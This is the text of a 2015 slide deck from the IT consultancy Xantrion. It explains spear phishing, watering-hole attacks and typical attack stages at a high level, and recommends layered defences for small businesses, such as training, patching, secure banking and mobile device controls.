TARGETED ATTACKS AND THE SMALL BUSINESS Stephen Ferrero Consultant, Xantrion
Dec 16, 2015
Xantrion• Founded in 2000 by Anne Bisagno and Tom Snyder• Wanted to bring big company IT to small and
midsized organizations• Among the top 50 worldwide MSPs (1)
• 45 person technical team• 70 core clients• 3000 end users supported• 600 servers managed
(1) MSP Mentor worldwide survey results.
Agenda
• The current SMB security paradigm• Why we need to evolve our thinking• Targeted attack methods• The new SMB security paradigm
Typical security layers
Hardware Firewall
Antivirus / Antimalware
OS Security Patches
User Rights Assignment
Email Filter Web Filter
Policies, and AwarenessUser
More targeted attacks on SMB
• Attackers have more and better resources • SMBs are typically less secure• SMBs make good launch points
Spear Phishing
1• Attacker collects data about
victim perhaps “friends” them on social networking sites
2 •Attacker looks for possible themes to leverage against victim
3 •Attacker crafts highly custom email message with malware laced attachment and sends to victim
4 •Victim opens highly realistic email and launches attachment
Water Hole Attack
1• Attacker collects data about
victim and the kind of websites they visit
2 •Attacker looks for vulnerabilities in these websites
3 •Attacker injects JavaScript or HTML which redirect to a separate site hosting exploit code
4 •Compromised site is waiting for unsuspecting victims
Process of A Typical AttackAttacker delivers custom malware
to victim
Victim opens the attachment, custom malware is installed
Malware phones home and pulls down
additional malware
Attacker establishes multiple re-entry
points
Attacker continues to attempt privilege
escalation and reconnaissance
Attacker achieves goal
and exits
1 2 3
4 5 6
Hardware Firewall
Antivirus / Antimalware
OS Security Patches
User Rights Assignment
Email Filter Web Filter
User
Spear Phishing, Waterholing, etc.
Typical SMB security layers
Hardware Firewall
Antivirus / Antimalware
OS Security Patches
User Rights Assignment
Email Filter Web Filter
Policies, and AwarenessUser
Add more layers• Educate employees• Review hiring and firing policies• Aggressive patching of OS and Apps
• Acrobat, Flash, QuickTime, Java• Get off End of Life software
• Windows XP• Office 2003 End of Support - April, 2014
Hardware Firewall
Antivirus / Antimalware
OS Security Patches
User Rights Assignment
Email Filter Web Filter
Additional security layers
HR and Security Policies
App Security Patches
User
User Awareness and Training
Identify your valuable assets
• Customer Data• Customer Relationships• Intellectual Property• Bank Account Info
Identify your special risks
• Internal threats• Liability• Unmanaged mobile devices• Physical security
Practice secure banking
• Use Two-Factor authentication• Require “Dual-Control” or separation of duties• Require one control be completed on a
dedicated PC• Require out-of-band confirmation from your
bank for large transactions
Protect mobile devices• Be aware of the increase in mobile malware• Stream data to mobile devices instead of
storing it there• Separate personal and work data• Track devices• Have remote-wipe capability• Enforce password policies
Regularly re-evaluate your security
Use the Top 20 security controls as a framework for frequent security policy updates. www.sans.org
Remind users of proper security best practices
Referencescybersecurity. (n.d.). In Merriam-Webster’s online dictionary. Retrieved from http://www.Merriam-webster.com/dictionary/cybersecuritySmall and midsize businesses. (n.d.). In Gartner IT Glossary. Retrieved from http://www.gartner.com/it-
glossary/smbs-small-and-midsize-businesses/Symantec Inc. (2013, April). Internet Security Threat Report. Retrieved from http://www.symantec.com/security_response/publications/threatreport.jspVerizon. (2012). Data Breach Investigations Report. Retrieved from http://www.verizonenterprise.com/products/security/dbir/?CMP=DMC- SMB_Z_ZZ_ZZ_Z_TV_N_Z041Mandiant. (2013) M-Trends 2013: Attack the Security Gap. Retrieved from https://www.mandiant.com/resources/m-trends/
Top 10 Threat Actions1. Keylogger / Form-Grabber / Spyware2. Exploitation of default or guessable passwords3. Use of stolen login credentials4. Send data to external site/entity5. Brute force and dictionary attacks6. Backdoor (Allows remote access / control)7. Exploitation of Backdoor or CnC Channel8. Disable or interfere with security controls9. Tampering10. Exploitation of insufficient authentication (no login required)